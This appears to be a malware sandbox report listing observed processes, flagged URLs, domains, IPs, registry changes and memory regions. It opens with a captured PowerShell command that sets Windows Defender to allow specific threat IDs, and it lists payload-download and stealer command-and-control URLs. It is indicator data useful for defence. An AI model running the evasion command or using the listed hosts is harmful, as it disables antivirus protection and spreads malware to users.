powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
"C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3808 -ip 3808
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2200,i,17811840805501722127,12993279827100568495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1936
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 57 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000
108.157.172.96
 malicious
http://185.172.128.76/3cd2b41cbde8fc9c.php
185.172.128.76
 malicious
http://185.172.128.76/15f649199f40275b/sqlite3.dll
185.172.128.76
 malicious
https://d68kcn56pzfb4.cloudfront.net/l
unknown
 malicious
http://185.172.128.76/15f649199f40275b/softokn3.dll
185.172.128.76
 malicious
https://d68kcn56pzfb4.cloudfront.net
unknown
 malicious
http://185.172.128.76
unknown
 malicious
http://185.172.128.76/15f649199f40275b/nss3.dll
185.172.128.76
 malicious
http://185.172.128.76/15f649199f40275b/mozglue.dll
185.172.128.76
 malicious
https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444
108.157.172.96
 malicious
http://185.172.128.76/15f649199f40275b/msvcp140.dll
185.172.128.76
 malicious
https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456
108.157.172.96
 malicious
https://d68kcn56pzfb4.cloudfront.net/
unknown
 malicious
https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000
108.157.172.96
 malicious
http://helsinki-dtc.com/updates/yd/wrtzr_yt_a_1/win/version.txt?QBydZwkpsFKAFvVdHIWuWCRJuDNJzwnPw
194.67.87.38
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
https://monoblocked.com/385128/setup.exe
45.130.41.108
http://www.vmware.com/0
unknown
http://185.172.128.228/BroomSetup.exe
185.172.128.228
http://185.172.128.59/ISetup1.exe
185.172.128.59
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
http://api4.check-data.xyz/api2/google_api_ifi
44.239.127.146
http://www.indyproject.org/
unknown
http://185.172.128.76/15f649199f40275b/mozglue.dll0
unknown
http://185.172.128.76/15f649199f40275b/nss3.dllyd4W
unknown
http://skrptfiles.tracemonitors.com/updates/yd/wrtzr_yt_a_1/win/version.txt?WgPZvcyXhSTVdehKKNnpLpnrTYhLSWhya
13.32.87.24
https://aka.ms/pscore6lB
unknown
http://www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt?TgRwmotRmvjanFwrAygiXReOJytNrSTXT
185.22.66.15
https://service-domain.xyz/google_ifi_ico.png?rnd=Zd3zh3ZT3XmF8YI2eYS_RGXB9UGXB3SGXB6CHXB7UGXB6FIXB4FHXB1SGXB9FIXB9HGXB6FIXB9JJXB0
3.80.150.121
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGO6Ir7EGIjBbMe3eQAtuCL3jg7g0TShqEj30UCC7_atPViR7K19ZkkguPUrDHWkhEYx3h598qBoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.250.189.132
https://nuget.org/nuget.exe
unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
192.178.50.36
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://download.iolo.net/
unknown
http://185.172.128.76/3cd2b41cbde8fc9c.php75b90b663400cbd2dd87518c2b422-released0eb916a7849bfb9cf354
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGO6Ir7EGIjAT31A6jm3jiUbYeNNo7BDZAsX_AO4Yhqat1pygOlLCpUVzhhDggamCbrUDp4EqjUUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.250.189.132
http://www.mozilla.com/en-US/blocklist/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://skrptfiles.tracemonitors.com/updates/yd/wrtzr_yt_a_1/win/version.txt
13.32.87.24
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://crl.ver)
unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe1
unknown
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://www.ecosia.org/newtab/
unknown
http://www.symauth.com/cps0(
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://github.com/Pester/Pester
unknown
http://www.rapidfilestorage.com/clrls/cl_rls.json
185.22.66.15
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKSIr7EGIjD_gy0lEzxGmT4ruUn43olxNd26dv_6t9V1kHHuQNrJ-I6ufJvD3u2tO-YexKH-zpoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
192.178.50.36
http://185.172.128.59/syncUpd.exe
185.172.128.59
http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
unknown
http://www.symauth.com/rpa00
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe
156.146.43.65
http://www.info-zip.org/
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKSIr7EGIjBNN4QNigwzXQnWujQoDXOdTWRctX9-iQ2o60jrfBaHO86I3LesLUSwtQRWNww27-YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
192.178.50.36
http://240216234727901.mjj.xne26.cfd
unknown
http://ocsp.sectigo.com0
unknown
https://download.iolo.net/sm/
unknown
https://contoso.com/License
unknown
http://185.172.128.228/ping.php?substr=one
185.172.128.228
http://185.172.128.76/15f649199f40275b/freebl3.dllVA
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt?tiEOSnvauSGeSrVtrRTjdcdKOYxLWZZtj
185.22.66.15
http://google.com
unknown
http://185.172.128.203/tiktok.exe
185.172.128.203
http://185.172.128.203/tiktok.exe00
unknown
http://skrptfiles.tracemonitors.com/updates/yd/wrtzr_yt_a_1/win/version.txt?iTfjhKmMUWxsWdQYLjvpBrapSwfuaDFGe
13.32.87.38
http://185.172.128.76M
unknown
http://www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt
185.22.66.15
http://d68kcn56pzfb4.cloudfront.net
unknown
https://d68kcn56pzfb4.cloudfront.net/load/load.php?c=1000/silentget
unknown
https://download.iolo.net:443/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.ex
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://sectigo.com/CPS0D
unknown
http://185.172.128.76/15f649199f40275b/softokn3.dll(A
unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
20.157.87.45
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.06
unknown
http://www.sqlite.org/copyright.html.
unknown
https://d68kcn56pzfb4.cloudfront.net/load/load.php?c=1000
108.157.172.96
http://helsinki-dtc.com/updates/yd/wrtzr_yt_a_1/win/version.txt?DBNgrjReMPwMuUWVmgNCxBVhWTyizBQlm
194.67.87.38
http://note.padd.cn.com/1/Package.zip
176.97.76.106
http://91.215.85.66:9000
unknown
http://nuget.org/NuGet.exe
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://api.check-data.xyz/api2/google_api_ifi
44.239.127.146
http://www.vmware.com/0/
unknown
http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4Fe
unknown
https://www.google.com/async/newtab_promos
192.178.50.36
https://d68kcn56pzfb4.cloudfront.net/load/load.php?c=1000y
unknown
http://185.172.128.76/3cd2b41cbde8fc9c.phpt
unknown
https://pastebin.com/raw/z9pYkqPQ
unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe7C:
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
c.574859385.xyz
37.221.125.202
 malicious
d68kcn56pzfb4.cloudfront.net
108.157.172.96
 malicious
service-domain.xyz
3.80.150.121
 malicious
api4.check-data.xyz
unknown
 malicious
api.check-data.xyz
unknown
 malicious
westus2-2.in.applicationinsights.azure.com
unknown
 malicious
www.rapidfilestorage.com
unknown
 malicious
clients2.googleusercontent.com
unknown
 malicious
skrptfiles.tracemonitors.com
unknown
 malicious
download.iolo.net
unknown
 malicious
240216234727901.mjj.xne26.cfd
unknown
 malicious
env-3936544.jcloud.kz
185.22.66.15
monoblocked.com
45.130.41.108
d1u0l9f6kr1di3.cloudfront.net
13.32.87.38
helsinki-dtc.com
194.67.87.38
iolo0.b-cdn.net
156.146.43.65
note.padd.cn.com
176.97.76.106
fp2e7a.wpc.phicdn.net
192.229.211.108
bg.microsoft.map.fastly.net
199.232.210.172
www.google.com
192.178.50.36
svc.iolo.com
20.157.87.45
googlehosted.l.googleusercontent.com
142.250.64.193
checkdata-1114476139.us-west-2.elb.amazonaws.com
44.239.127.146
There are 13 hidden domains, click here to show them.

IPs

IP
Domain
Country
Malicious
185.172.128.90
unknown
Russian Federation
malicious
108.157.172.96
d68kcn56pzfb4.cloudfront.net
United States
malicious
37.221.125.202
c.574859385.xyz
Lithuania
malicious
185.172.128.76
unknown
Russian Federation
malicious
192.168.2.5
unknown
unknown
malicious
91.215.85.66
unknown
Russian Federation
malicious
185.172.128.228
unknown
Russian Federation
192.178.50.36
www.google.com
United States
185.172.128.203
unknown
Russian Federation
20.157.87.45
svc.iolo.com
United States
176.97.76.106
note.padd.cn.com
United Kingdom
185.172.128.59
unknown
Russian Federation
192.168.2.6
unknown
unknown
156.146.43.65
iolo0.b-cdn.net
United States
239.255.255.250
unknown
Reserved
45.130.41.108
monoblocked.com
Russian Federation
127.0.0.1
unknown
unknown
There are 7 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\ndfapi.dll,-40001
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\BroomCleaner
Installed
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications
MaxSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications
Retention
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Mechanic
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Mechanic
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Service Manager
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Service Manager
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\ActiveCare
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\ActiveCare
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\DriveScrubber
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\DriveScrubber
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Guard
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Guard
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Tune-Up Definitions
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Tune-Up Definitions
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
ProgramId
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
FileId
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
LowerCaseLongPath
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
LongPathHash
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
Name
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
OriginalFileName
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
Publisher
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
Version
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
BinFileVersion
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
BinaryType
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
ProductName
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
ProductVersion
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
LinkDate
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
BinProductVersion
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
AppxPackageFullName
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
AppxPackageRelativeId
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
Size
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
Language
\REGISTRY\A\{aa7437e5-7925-9906-35ab-aceba6082fc7}\Root\InventoryApplicationFile\i1.exe|a5834a78785296c2
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147735503
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147814524
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147780199
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147812831
HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
TelemetrySalt
HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1a4b1382-eeb5-4d59-b0fa-b93f83a518e1}
MaxCapacity
HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1a4b1382-eeb5-4d59-b0fa-b93f83a518e1}
NukeOnDelete
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileDirectory
There are 72 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
4223000
heap
page read and write
 malicious
427A000
heap
page read and write
 malicious
5870000
direct allocation
page read and write
 malicious
400000
unkown
page execute and read and write
 malicious
335E000
heap
page read and write
 malicious
41B0000
direct allocation
page read and write
 malicious
1102000
unkown
page readonly
 malicious
4F92000
trusted library allocation
page read and write
 malicious
4180000
direct allocation
page execute and read and write
 malicious
2E91000
heap
page read and write
521E000
trusted library allocation
page read and write
41B000
unkown
page readonly
2E91000
heap
page read and write
6478000
trusted library allocation
page read and write
765807E000
unkown
page readonly
2E91000
heap
page read and write
40A7000
heap
page read and write
2E90000
heap
page read and write
2E91000
heap
page read and write
40FB000
heap
page read and write
2E91000
heap
page read and write
E81000
heap
page read and write
5DCF000
heap
page read and write
2F3E000
stack
page read and write
2E91000
heap
page read and write
5D26000
heap
page read and write
5D51000
heap
page read and write
166C000
stack
page read and write
3140000
heap
page read and write
37C02000
heap
page read and write
4BEF000
heap
page read and write
84BE000
stack
page read and write
2924000
heap
page read and write
262C133E000
heap
page read and write
5E81000
heap
page read and write
2924000
heap
page read and write
27A9000
direct allocation
page read and write
24825000
heap
page read and write
37BEE000
heap
page read and write
99B000
heap
page read and write
636000
unkown
page read and write
7A0D000
stack
page read and write
32FD000
trusted library allocation
page read and write
3640000
heap
page read and write
57C000
stack
page read and write
397C000
unkown
page read and write
2F7D000
heap
page read and write
41ED000
trusted library allocation
page read and write
2C8B000
unkown
page read and write
EE2000
heap
page read and write
6485000
trusted library allocation
page read and write
401000
unkown
page execute read
14A4000
heap
page read and write
E7A000
unkown
page read and write
4C3E000
stack
page read and write
1CB000
stack
page read and write
43B4000
trusted library allocation
page read and write
AF0000
heap
page read and write
24854000
heap
page read and write
2C89000
heap
